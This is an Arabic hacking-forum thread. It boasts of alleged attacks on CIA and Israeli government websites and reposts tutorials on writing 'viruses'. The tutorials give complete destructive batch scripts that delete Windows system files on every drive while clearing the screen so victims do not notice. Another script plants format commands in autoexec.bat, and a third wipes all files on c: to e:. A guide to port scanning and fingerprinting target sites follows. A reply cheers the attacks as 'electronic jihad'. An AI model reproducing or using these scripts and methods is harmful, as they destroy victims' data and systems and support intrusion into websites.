فى البداية أود ان ااكد على عدة ملاحظات:

1-انا Baraa93 ارى ان امريكا هى اجمل مكان على ظهر الكرة الارضية رأته عيناى
وأنا رأيت كل اوروبا تقريبا و الصين و الهند ....الخ
2-الشعب الامريكى بعيدا عن المؤسسة العسكرية ورغم انفها وانف السيد بوش شخصيا
وأنف اللوبى الصهيونى فالشعب الأمريكى شعب عظيم وبانى حضارة العصر.
3-سوف تبقى ارض الحرمين الشريفين هى ارض قبلتنا نحن المسلمين ندافع عنها بارواحنا
وأولادنا واموالنا جيلا بعد جيل رغم انف الصليبيين الجدد و القدامى ورغم انف الأعلام
الامريكى الذى يحاول تشويه رمز السلام والمسلمين فى محاولته تشويه مواقف المملكة
والمواقف المصرية التى تدعم القضايا الاسلامية و العربية.
4- سوف تبقى اسرائيل ( اذا بقيت) هى العدو الرئيسى لامتنا الاسلامية الى ان تعود فلسطين كاملة
الى اصحابها العرب الفلسطينيين وعاصمتها القدس الشريفة.
5- لقد قاتل العرب الصهاينة فى حروب مريرة كان للجيش المصرى البطل و الجيش السورى الباسل
الدور الرئيسى بدعم غير محدود من المملكة العربية السعودية رغم ادعاءات بعض الاخوة (الزعماء)
العرب الذين دمروا اسلحتهم بعد ذلك وانكشفوا تماما فى العصر الامريكى السعيد عليهم رغم تبجحهم
السافر (السافل) على نظام ارض الحرمين الشريفين وعلى النظام المصرى الذى يقوده الطيار المقاتل
محمد حسنى مبارك وغم كل الادعاءهت والمزايدات بقى نظام خادم الحرمين الشريفين والنظام المصرى
والنظام السورى الذى ارسى دعائمه الرئيس العربى (بحق) السورى حافظ الأسد بقوا صامدين فى مواجهة
الصهاينة و المؤسسة العسكرية الأمريكية رغم انف الخونة والمزايدين (العرب) واعلامهم المحترف
عالى التقنية والمشبوه وغم الأعلام الأمريكى الممول من الصهيونية العالمية بفضائياته الحرة التى
تنضح حرية و سموم.
6 - ما ان نشر موقع هكر ضمى نجد الموضوع الذى كتبته عن اختراق موقع CIA حتى ارسل لى احد الاشخاص
CD اخرى هذه المرة ليست عن اختراق موقع بل عن تدمير الموقع تماما بالفيروسات لدرجة اغلاقه تماما
واستنجاد ميكروسوفت بجلالة قدرها ان يلحقها العملاء بالأخبار.
و هذا الموقع الذى تم تدميره هو الموقع الرسمى لاسرائيل وأنا لااعرف هل الشخص الذى ارسل لى ال CD هذه
المرة هو نفسه صاحب المرة الاولى ام لا.
7- واجد نفسى ملزما بان اقول اننى لست صاحب هذا العمل الرائع فهذا شرف لا ؟؟؟؟؟؟؟؟؟؟ ولا ادعيه.
8-ومرة اخرى بعد اذن المشرفين على منتدى هكر ضمى نجد اعيد نشر ما سبق نشره عن اختراق المواقع
الذى نقلته بالحرف من اخى العزيز KING HAKER وليسمح لى هذه المرة ايضا بالنقل عنه
وبالحرف الواحد ما كتبه عن طريقة كتابة الفيروسات غير اننى اضفت من عندى برنامج صغيييييييير
كتبه احد الاصضقاء لعمل دودة فيروسية والذى ربما يكون هو المستخدم فى تدمير الموقع الاسرائيلى.

والدعوة عامة للفرجة على خيبة الصهاينة
واستنجاد ميكروسوفت بالعملاء فى النت
او
ميكروزيفت
كما يكتبها الصهاينة وسوف تشاهدونها بأنفسكم
فزوروا هذا الموقع وتمتعوا

[فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...]

9 - واتمنى ان يسمح لى KING HAKER نقلى ما كتبه وان لم يسمح لى فانا اعتذر
اليه وليغفر لى ملتمسا عذرى فانا فعلت ذلك خدمة للجميع وشرحا لما قام به
الصضيق الذى قام باختراق موقع CIA الذى ربما يكون قد استخدم طريقة مختلفة
ووعدنى فى رسالته بان يشرحها لى قريبا .
وبهذه المناسبة فانا اشكر كلا من:
الهكر العالمى :
ZERO

الهكر القدير : CUTEDEVIL
على كل ما تعلمته منهما

الصور المرفقة

	1.JPG (44.6 كيلوبايت, 72 مشاهدات)
	2.jpg (56.6 كيلوبايت, 65 مشاهدات)
	3.jpg (90.4 كيلوبايت, 92 مشاهدات)
	4.jpg (21.1 كيلوبايت, 61 مشاهدات)
	5.jpg (64.4 كيلوبايت, 86 مشاهدات)

و عن الفيروسات يقول الكينج ( KING HAKER ) :


هذه اكواد فيروسات مع الشرح


اولاٌ : كيفية تصميم فايروسات عن طريق الدوس


هنا يجب ان تعرف ان فايروسات الدوس ليست إلا بعض الاوامر
المقدمه
والتي تقوم بمسح ملفات السستم من اجل ان تبطل عمل الوندز

مثال : لو اردت ان امسح ملفات معينه يكون الامر المستخدم


del اسم الملف . المسار
بحيث يكون
del file name.exe or dll او اي مسار

مثال لتصميم فايرس صغير يدمر الوندز



-------------------------------------------------------------------------------------الكود------------------------------------------------------------------------------------------
del C:\windows\*.ini *.exe *.scr *.txt *.log
del C:\windows\system32\ *.ini *.exe *.scr *.txt *.log
*.nls *.drf *.reg *.sys *.dll
del C:\windows\system\ *.ini *.exe *.scr *.txt *.log
*.nls *.drf *.reg *.sys *.dll

------------------------------------------------------------------------------------------------------نهاية
الكود-------------------------------------------------------------------

==================================================
=======================
==================================================
=======================

الحين راح اشرح لكم امر الفايرس بالتفصيل المملل

اول شي قدمه امر
@del ( لمسح الملفات )

ثاني شي حدد المكان الموجوده فيه الملفات
C:\windows\
C:\windows\system32
C:\windows\system\
هذه اهي الاماكن الموجوده فيها الملفات

ثالث شي قدمه نوع المسارات الي يجب ان تمسح
وهذه طريقه جديدة وجيدة


لوكنا نريد ان نمسح ملف ويكون مساره
exe
نضع
*.exe
وعلامة
*.
تعني مسح جميع الملفات التي تحمل المسار المحدد
والمسار اهو exe او اي مسار ثاني
يعني عندما نريد كتابة فيروس لاختصار الوقت والحجم والكتابه
نضع
*.exe
*.scr
*.ini
*.sys
*.nls
*.dll
بهذه الطريقه نعطى امرا بمسح الملفات ذات
مسارexe.scr.ini.sys.nls.dll
مهما كان اسم الملف فهذا الشي غير مهم ما دام يحمل احد هذه
المسارات فانه سيمسح

ــــــــــــــــــــــــــــــــ فيروس القاتل
ــــــــــــــــــــــــــ
وعمل الفايرس هو مسح الوندوز بالكامل

و طريقة التصميم فى هذا الشرح


-------------------------------------------------------------------------------------الكود------------------------------------------------------------------------------------------
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd WINDOWS
Cls
del *.exe
del *.scr
del *.ini
del *.txt
del *.dll
del *.dat
del *.sys
del *.bmp
del *.gif
del *.jpg
Cls
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com
*.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com
*.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
Cls
cd system
Cls
del *.manifest
del taskmgr.exe
del *.dll
del *.ocx
del *.sys
del *.ini
del *.drf
del *.log
del *.nls
Cls
del *.wsc
del *.oca
del *.msc
del *.exe
del *.com
del *.scr
del *.vbs
del *.inf
del *.acm
del *.dat
del *.HLP
Cls
del *.sve
del *.tha
del *.nls
del *.sep
del *.TXT
del *.reg
Cls
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com
*.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com
*.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com
*.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com
*.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com
*.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
Cls
cd drivers
del *.sys
del *.sys
Cls
cd ..
cd CatRoot2
del *.log
del *.txt
del *.chk
Cls
cd ..
cd Com
del *.msc
del *.exe
del *.dll
del *.tlb
Cls
cd ..
cd config
del *.txt
del *.Evt
del *.sav
cd ..
@del *.dll
cd ..
cd ..
cd ..
cd ..
cd ..
cd ..
cd WINDOWS
cd system32
Cls
del *.manifest
del taskmgr.exe
del *.dll
Cls
del *.ocx
del *.sys
del *.ini
del *.drf
del *.log
del *.nls
del *.wsc
del *.oca
del *.msc
Cls
del *.exe
del *.com
del *.scr
del *.vbs
del *.inf
Cls
del *.acm
del *.dat
del *.HLP
del *.sve
del *.tha
Cls
del *.nls
del *.sep
del *.TXT
del *.reg
Cls
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com
*.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com
*.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com
*.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com
*.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
del *.dll *.ini *.dat *.vbs *.sys *.exe *.scr *.com
*.txt *.reg *.nls *.sep *.exe *.scr *.dll *.ini *.log
Cls
cd drivers
del *.sys
del *.sys
Cls
cd ..
cd CatRoot2
del *.log
del *.txt
del *.chk
Cls
cd ..
cd Com
del *.msc
del *.exe
del *.dll
del *.tlb
Cls
cd ..
cd config
del *.txt
del *.Evt
del *.sav
Cls
cd ..
@del *.dll
@echo off
echo Fuck u( >>010<<)
echo he kille u pc donot trea
echo if the virs he did not find the system file
echo u fuck he will find hem now
@del C:\windows\*.ini
Cls
@del C:\windows\*.exe
Cls
@del C:\windows\*.com
Cls
@del C:\windows\system32\*.exe
Cls
@del C:\windows\system32\*.sys
Cls
@del C:\windows\system32\*.log
Cls
@del C:\windows\system32\*.drf
Cls
@del C:\windows\system32\*.scr
Cls
@del C:\windows\system32\*.dll
Cls
@del C:\windows\system32\*.ini
Cls
@del c:\windows\system\*.exe
Cls
@del c:\windows\system\*.sys
Cls
@del c:\windows\system\*.log
Cls
@del c:\windows\system\*.drf
Cls
@del c:\windows\system\*.scr
Cls
@del c:\windows\system\*.dll
Cls
@echo off
echo Fuck u( >>010<<)
@del d:\windows\*.ini
Cls
@del d:\windows\*.exe
Cls
@del d:\windows\*.com
Cls
@del d:\windows\system32\*.exe
Cls
@del d:\windows\system32\*.sys
Cls
@del d:\windows\system32\*.log
Cls
@del d:\windows\system32\*.drf
Cls
@del d:\windows\system32\*.scr
Cls
@del d:\windows\system32\*.dll
Cls
@del d:\windows\system32\*.ini
Cls
@del d:\windows\system\*.exe
Cls
@del d:\windows\system\*.sys
Cls
@del d:\windows\system\*.log
Cls
@del d:\windows\system\*.drf
Cls
@del d:\windows\system\*.scr
Cls
@del d:\windows\system\*.dll
Cls
@echo off
echo Fuck u ( >>010<<)
@del e:\windows\*.ini
Cls
@del e:\windows\*.exe
Cls
@del e:\windows\*.com
Cls
@del e:\windows\system32\*.exe
Cls
@del e:\windows\system32\*.sys
Cls
@del e:\windows\system32\*.log
Cls
@del e:\windows\system32\*.drf
Cls
@del e:\windows\system32\*.scr
Cls
@del e:\windows\system32\*.dll
Cls
@del e:\windows\system32\*.ini
Cls
@del e:\windows\system\*.exe
Cls
@del e:\windows\system\*.sys
Cls
@del e:\windows\system\*.log
Cls
@del e:\windows\system\*.drf
Cls
@del e:\windows\system\*.scr
Cls
@del e:\windows\system\*.dll
@echo off
echo Fuck u ( >>010<<)
@del f:\windows\*.ini
Cls
@del f:\windows\*.exe
Cls
@del f:\windows\*.com
Cls
@del f:\windows\system32\*.exe
Cls
@del f:\windows\system32\*.sys
Cls
@del f:\windows\system32\*.log
Cls
@del f:\windows\system32\*.drf
Cls
@del f:\windows\system32\*.scr
Cls
@del f:\windows\system32\*.dll
Cls
@del f:\windows\system\*.exe
Cls
@del f:\windows\system\*.sys
Cls
@del f:\windows\system\*.log
Cls
@del f:\windows\system\*.drf
Cls
@del f:\windows\system\*.scr
Cls
@del f:\windows\system\*.dll
@pause
@echo off
echo Fuck u( >>010<<)
echo [killer virs_v1] By DosMan [Q8_KOL@HOTMAIL.COM]
echo if u found u pc has been fuck in theis virs u shoud
now ther
echo are one man he can do that DosMan if u want virs
fucker pc
echo like thet Die you mother fuckers
echo ha ha ha ha [Q8_KOL@HOTMAIL.COM]
@pause
:exit
-------------------------------------------------------------------------------نهاية
الكود--------------------------------------------------------------------------

الصور المرفقة

6.JPG (158.7 كيلوبايت, 79 مشاهدات)

الملفات المرفقة

	VBSWG2.zip (118.7 كيلوبايت, 15 مشاهدات)
	KareemReg.zip (680.4 كيلوبايت, 7 مشاهدات)
	تدمير الموقع الرسمى لاسرائيل.txt (66.4 كيلوبايت, 12 مشاهدات)

والآن هذا هو شرح الكود :

امر
..cd

هو امر الرجوع للمفات للوراء

وتم استخدمامه لسبب واحد

اول ما سيتم فتح الملف سيدخل الفايرس لمفات الوندز من دون
الحاجه من تحديد المسار
يعني اذا كان الوندز في
c: او d:او f:او e:
راح يصيده يعني راح يصيده لان هذا الامر يخلي الفايرس يرجع
لان يوصل لملف الوندز

يعني مثلما اول ما نفتح شاشة الدوس هذا الشكل

--------------------------------------- D:\Documents and
Settings\HITLER>
-----------------------------------------<
تنفتح شاشة الدوس بهذا الشكل ويطلع لي هذا المسار

الآن ماهو الامر الذى اضعه للوصول الى ملف
windows او system او system32
الامر
cd ..
اكتبه اكثر من مره من اجل الوصول إلى الملفات المطلوبه

وللتذكير هذا الامر يستخدم للرجوع للوراء والفائده من
الوصول إلى الملفات المطلوبه مهما كان المكان
الذي تم فيه فتح الفايرس


امر
cd WINDOWS
او
cd system32
او
cd system

يستخدم هذا الامر من اجل الدخول إلى الملف المطلوب

cd اسم الملف الذى نريد ان تدخله

cd name the file u want open in dos

ويتم دخلول الملفات بعد تعين المسار المطلوب ومثل ما ترون
قدم قدمنا امر الرجوع من اجل الوصول إلى ملفات الوندز ومن
ثم كتبنا اسم الملفات التي نريد ان ندخلها

بالاوامر الموجد

امر
Cls
امر تنظييف شاشة الدوس
تم استخدام هذا الامر من اجل جعل الاوامر تنفذ بسرعه ومن
دون شعور الضحيه بالاوامر التي مرت عليه

del *.ocx
del *.sys
del *.ini
del *.drf
del *.log
del *.nls
del *.wsc
del *.oca
del *.msc
اعتقد ان تم شرح هذا الامر من قبل
ولا تنسون هذا الامر لمسح الملفات التي على هذه المسارات
فان كنت
تريد ان تعرف كيفيه مسح ملف محدد فما عليك إلا كتابه
del file name.exe او dll او اي مسار
ويجب ان يكون الملف الذي تريد حذفه محدد المسار عن طريق
شاشة الدوس

يعني لازم نكتب امر المسح اول شي ومن ثما اسم الملف
المطلوب مسحه ومن ثم مسار الملف

امر @echo off

امر ستخدم من اجل كتابة اوامر تنفذ على شاشة الدوس او من
اجل ظهور الكتابه على شاشة الدوس
@echo off

echo اكتب هنا الاوامر او اكتب ما تريد ان يظهر على شاشة
الدوس

بعدين تحديد مسارات الملفات بذكر اسم
المحرك c: // d: // e: // f: //

والسبب ان وندزي بالدي ووقت شغلت الفايرس بالسي ما صاد
الملفات


بمعني اخر ان تم تشغيل الفايرس بالكمبيوتر سيتم تدمير
الجهاز ولاكن اذا تم تشغيل الفايرس بال C والوندوز غير
موجود بالC فلن يصيد الملفات
لكنه الآن بعد التعديل فيسوف يصيده ولن يصلح الجهاز
إلا إذا تفرمت .

-----------------------
شرح كود فايرس اخر-
----------------------

----------------------------------------&##1575;لكود-----------------------------------------------
call attrib -h -r c:\autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
echo format d: /q /u /autotest >nul >>c:\autoexec.bat
echo format e: /q /u /autotest >nul >>c:\autoexec.bat
echo format f: /q /u /autotest >nul >>c:\autoexec.bat
----------------------------------------------------------------نهاية
الكود-------------------------------------------------------------------

شرح الكود

echo format c: /q /u /autotest >nul >>c:\autoexec.bat

echo من اجل الكتابه

format c: /q /u / امر فرمات

اسم الامر من اجل وضعه بملف autotest

nul [ عملية مضاعفه لامر الفرمات [ من اجل جعل الامر مرتين
بدل مره واحده

c:\autoexec.bat المكان الذي سيتم الحفظ فيه بجهاز الضحيه

وتم اختيار اسم autoexec

من اجل ان يعمل الفايرس من تلقاء نفسه

واذا قمت بكتابة كود الفايرس بنوته باد ومن ثم تغير مسار
النوته إلى bat

وفتح الملف سوف تجد ملفات باسم

autoexec موجود في c:

لان تم تحديد مكان الحفظ في السي

وستكون الاوامر بهذا الشكل

format c: /q /u /autotest
format c: /q /u /autotest

وظهرت الاوامر بهذا الشكل لاننا كتبنا في الكود nul

ولهذا السبب تم مضاعفة الامر في الملف الذي عمله الفايرس
نسخه في السي

ومثل ما ترون تم مضاعفة الامر الذي شرحته لكم اكثر من مره

------------------------------
كود فايرس اخر


-------------------------------------------------------------------------------------الكود------------------------------------------------------------------------------------------
@echo off
ATTRIB -a -s -h -r c:\*.*
ATTRIB -a -s -h -r c:\windows\*.*
Echo y | echo a | Echo y |del c:\*.*
Echo y | echo a | Echo y |del d:\*.*
Echo y | echo a | Echo y |del e:\*.*
echo y | copy *.* c:\
echo y | copy *.* D:\
echo y | copy *.* E:\
restart

------------------------------------------------------------------------------------------------------نهاية
الكود-------------------------------------------------------------------

شرح الكود

بالاول حبين ان اوضح لكم ان عندما تقدم امر
*.*
وهو امر لمسح كل الملفات الموجود بالمجلد الذي حددته بشاشة
الدوس

ستظهر رساله تطلب من الموافقه على هذا الامر

للتوضيح

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\^^MR-HONFER^^\^^MR-HONFER^^VIRS\virs in bat>cd n

C:\^^MR-HONFER^^\^^MR-HONFER^^VIRS\virs in bat\n>del *.*
C:\^^MR-HONFER^^\^^MR-HONFER^^VIRS\virs in bat\n\*.*,
Are you sure (Y/N)? y

C:\^^MR-HONFER^^\^^MR-HONFER^^VIRS\virs in bat\n>

وكما ترون عندما تم الطلب مسح جميع الملفات الموجوده في
مجلد n

خرجت لي رساله من اجل التأكد من موافقتي Are you sure
(Y/N)

وبعد الضغط على

y

تم المسح

ولاكن ما هي الطريقه المتبعه من اجل تفادي هذه الرساله اذا
كنا نريد ان نعمل فايرس بأوامر الدوس

الحل موجود بكود الفايرسالذي قدمته لكم

امر

Echo y | echo a | Echo y |del *.*

يستخدم لمسح جميع الملفات من دون الطلب

وطريقة استخدام الامر تتم بعد تحديد مسار الملف الذي تريد
دخوله عن طريق الدوس ومن ثم كتابة الامر

ومن ثم يتم المسح

ولاكن الذي يوجد به هذا الكود ان تم تحديد المسار

Echo y | echo a | Echo y |del c:\*.*

ومثل ما هو ظاهر ان تم تحديد مسح جميع الملفات التي في
المحرك c:

وتم كتابة مثل هذا الامر في كود الفايرس ولاكن من اجل مسح
المحركات الاخري

وكان ذالك بتحديد المحركات مثل ما ترون

فتم تحديد المحرك
c:
d:
e:
من اجل ان يتم حذف جميع الملفات التي فيه

والامر الذي بعد الامر الحذف هو امر نسخ جميع الملفات

echo y | copy *.*

وهذا الامر يعطي امكانيه نسخ جميع الملفات من دون خروج
رسالة الموافقه مثل التي مبينه عندكم

*.*, Are you sure (Y/N)? y

ولاكن بكود الفايرس تم تحديد المسارات مثل ما ترون
c:
d:
e:

وبذالك نكون شرحنه هذا الكود


قبل انهاء الدرس الاول بالدوس حبيت اذكركم ان بعد ان يتم
كتابة الاوامر في نوته باد

يتم تغير المسار إلى bat

ملاحظة لاخى العزيز KING HAKER
منك لله يا كينج فقد اصبت جهازى باحد الفيروسات
وانا احاول تعلم طريقتك لكنى تخلصت منه وارجو منك
ان تشرح لنا طريقة ما لتلافى ذلك وقد ارفقت مع هذا
الموضوع برنامج يقوم بتصليح ملفات الريجيسترى
اذا تغيرت اثناء كتابة الفيروسات وبشكل عام
فان برنامج KareemReg الذى ارفقتهمفيد فى تصليح
ملفات الريجيسترى عموما.

ونعيد مانشرناه سابقا عن اختراق المواقع

يقول الكينج ( KING HAKER ) :


في البداية يجب أن تعلم بعض المعلومات البسيطة مثل :
admin = المدير
OS = Operating System = نظام تشغيل
بورت = منفذ = Port

سيرفر = خادم = Server : وهي عبارة عن أجهزة كمبيوترفائقة
القدرة ذات قدرة كبيرة على المعالجة وتخزن بها ملفات
المعلومات وقواعد بيانات الشبكة والبرامج المختلفة بها.


لاختراق أي موقع تحتاج لمعرفة بعض المعلومات عن
الهدف(الموقع) كنظام التشغيل الذي يعمل عليه والخدمات
الموجودة بالموقع


لا تتعجل فشرح هذه الأمور قادم لتعرف أي الثغرات ستسخدم
أوستستغل لاختراق الموقع والآن سوف نعرف عمل
ذلك



1- عليك عمل بورت سكان Port Scan لمعرفة البورتات أو
المنافذ المفتوحة بالموقع.من لينكس يمكنك إستخدام nmap


من الويندوز يمكنك استخدام برنامج
Super Scan
ومثل هذا البرنامج اكثر من الهم على القلب فى جميع المنتديات العربية


وتفيدك هذه العملية فيما بعد في نزع التوقيع فمثلا لو وجدت
ان موقعا مفتوح به البورت 21 وهو للتلنت
يمكنك الذهاب إلى تلنت وهو برنامج يأتي مع الويندوز

start==>run

إبدأ==>تشغيل

ثم اكتب

telnet
بعد ذلك إضغط على قائمة
connect
ثم
Remote System
ستظهر لك شاشة اكتب اسم الموقع في Host Name واترك المنفذ
كما هو telnet
ثم اضغط
connect
سيتصل بالموقع وحينئذ سيظهر نظام التشغيل للموقع.
وأهم البورتات هي
23للتلنت وهي خدمة تسمح لمستخدميها بالاتصال بأي جهاز آخر
يستعمل نفس الخدمة
21لل ftp أو بروتوكول نقل الملفات FTP=Files
Transefiring Protocol
والبريد الصادر والوارد 110 - 25

21 FTP
22 SSH
23 Telnet
25 SMTP
79 Finger
80 HTTP
110 POP3

وللإتصال ببورت معين من التلنت اكتب البورت في خانة Port
مكان كلمة Telnet
هذا الموقع يمكنك من معرفة العديد من الأشياء عن اي موقع
[فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...]


2- الخطوة الثانية هي ما يسميه البعض نزع التوقيع أو فحص
البانر.
والبانر هو الرسالة التي تراها حين تحاول الاتصال بجهاز ما
(أو موقع فلا فرق ) عبر منفذ (بورت) معين.
فمثلا حين تحاول الاتصال عبر البورت 23 وهو للتلنت مع جهاز
يعمل على نظام لينكس ماندريك سيظهر لك الآتي :


Linux Mandrake release 6.1 (Helios)
Kernel 2.2.13-4mdksmp on an i686
login:


ما عرفناه من هذا أن هذا الجهاز يعمل على نظام تشغيل لينكس
مانريك 6.1 والنواة هي 2.2.13.


3- شء آخر عليك ملاحظته هو رسائل الأخطاء! ومن أشهرها
الرسالة 404 Error وهي تظهر عند طلب ملف غير موجود بالموقع
وعند ظهور هذه الصفحة انظر
إلى أسفل الصفحة وقد تجد معلومات مثل إصدارة ملقم الويب
وهذه معلومات غير مضرة أو خطيرة لكنها تفيد
في عملية الاختراق


* عليك ان تعرف أن الموقع هو عبارة عن جهاز كمبيوتر لكنه
يعمل 24 ساعة ويوجد به ملقم ويب (خادم) Web Server ويعمل
على نظام تشغيل وأنت حين تخترق فإنك تخترق هذا
الجهاز الذي توجد عليه كل ملفات الموقع وقد يوجد على
الجهاز أكثر من موقع مثل شركات الإستضافة وهذه تكون ضربة
الهاكر الكبرى( يقول الشخص الذى ارسل لى هذه الرسالة انه عندما اخترق
موقع ال CIA وجد االآتى



Host name: odci.odci.gov
Alias:
[فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...]
[فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...]
[فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...]
[فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...]
[فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...]
[فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...]
cia.cia.gov


TraceRoute to 198.81.129.100 [odci.odci
و الآن يا صاحبى

يجب عليك معرفة الأشياء التالية عن اي موقع :

- معرفة نوع وإصدارة ملقم الويب هل هو IIS4 - IIS5 هل هو
Apache ....
- معرفة &نظام التشغيل وإصدارته هل هو Windows200 مثلا أو
Linux redhat 6.2 مثلا...
وعليك معرفة ذلك لأن لكل نظام تشغيل الثغرات الخاصة
به...وأيضا توجد ثغرات لملقم الويب مثل ثغرة اليونيكود
لسيرفرات IIS.
- معرفة &كل سكربتات بيرل وسي جي آي الموجودة بالموقع مثل
المنتديات وسجل الزوارأو عداد الزوار وهكذا.....
- وأيضا معرفة كل الخدمات الأخرى بالموقع كالبريد
وغيرها...ومثلا معرفة نوع وإصدارة سيرفر الإف تي بي إن وجد
بالموقع (حسب البورت سكان كما سبق فانا اعرف انك ذكى وسوف تعيد وتزيد فى القراءة)
وأيضا مفسر نصوص بيرل إن وجد ... كل هذه الأشياء يمكنك
إيجاد ثغرات لها...حسنا كيف تعرف هذه المعلومات عن الموقع

الصور المرفقة

	1.JPG (44.6 كيلوبايت, 58 مشاهدات)
	2.jpg (56.6 كيلوبايت, 56 مشاهدات)
	3.jpg (90.4 كيلوبايت, 69 مشاهدات)

 

في البداية اود ان اشكرك اخي العزيز وعلى ما فعلتموه في تلك المواقع وضربها وتدميرها ولكن اود منك اخي العزيز ان تشرح الطريقة التي تستخدمونها في عملية الأختراق شرحاً مفصلاً ان امكن كي يستفيد الأعضاء ويشاركونكم في
تلك العملية وما هي نو عية الثغرة و البرامج المستخدمة في ذالك ... لأن هذا يعتبر من الحرب الألكترونية او بمعنى اصح الجهاد الألكترونية ولا اعتقد ان احداً يبخل في هذه الأشياء وخصوصاً ان هذفنا واحد وهو تدمير المواقع الصهيونية والأمريكية ..... واتمنى منك الرد الشافي
===================
تعقيب على ما ذكرة
الشعب الامريكى بعيدا عن المؤسسة العسكرية ورغم انفها وانف السيد بوش شخصيا
وأنف اللوبى الصهيونى فالشعب الأمريكى شعب عظيم وبانى حضارة العصر
===================
نعم كلامك صحيح الشعب الأمريكي بعيداً عن السياسة والمؤسسات العسكرية ولكن هذا ليس مبرراً
فلو اردو لقلبو الطاوله على الصهاينة واخرجو اللوبي الصهيوني من العبث في السياسة الأمريكية
فأنا اعتقد ان الراضي كلفاعل يعني بمعنى اصح الي متى وهم بعيدين عن السياسة والمؤسسة العسكرية
حتى يقضى علينا كلياً ويتم احتلال باقي الوطن العربي من الأمريكان والصهاينة متى يصحى الشعب الأمريكي من غفلتة ؟؟؟؟ ومن سؤ عجزنا اننا اصبحنا نتأمل في الشعب الأمريكي حتى يصحو من غفلتة
ونسينا انفسنا فنحن الذين غارقون في الغيبوبة ونحن الذي يجب علينا ان نصحو و ان نتحرك ونفعل شياءً ولاكن لا اقول الا حسبي الله ونعم الوكيل على من وضع الأمة الأسلامية في موقف الذل والأهانة والأنبطاح لسيد البيت الأسود ..........